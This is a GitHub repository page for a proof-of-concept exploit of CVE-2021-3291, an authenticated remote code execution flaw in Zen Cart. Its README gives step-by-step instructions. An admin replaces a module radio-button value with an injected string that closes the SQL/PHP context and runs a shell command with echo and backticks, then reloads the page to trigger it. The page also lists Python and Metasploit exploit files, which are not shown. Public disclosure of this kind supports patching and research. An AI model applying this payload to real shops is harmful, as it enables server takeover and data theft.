Skip to content

MucahitSaratar/zencart_auth_rce_poc

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

22 Commits

images

images

 
 

README.md

README.md

 
 

zencart_authenticated_rce.rb

zencart_authenticated_rce.rb

 
 

zencart_v157b_authenticated_rce_exploit.py

zencart_v157b_authenticated_rce_exploit.py

 
 

Repository files navigation

zencart_auth_rce_poc CVE-2021-3291

1-) login as admin

2-) get any modules edit page

3-) inspect element any true radiobox

4-) change true to true','MODULE_ORDER_TOTAL_TOTAL_STATUS'); echo `id`; //

5-) click update

6-) to trig command go again edit page

CVE-2021-3291 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3291

POC

exploiting send command refresh page refresh page zoom

zoom

Metasploit

Ekran görüntüsü 2021-01-27 00-03-55

GIF

kanit

About

No description, website, or topics provided.

Resources

Readme
Activity

Stars

7 stars

Watchers

2 watching

Forks

2 forks
Report repository

Releases

No releases published

Packages

No packages published

Languages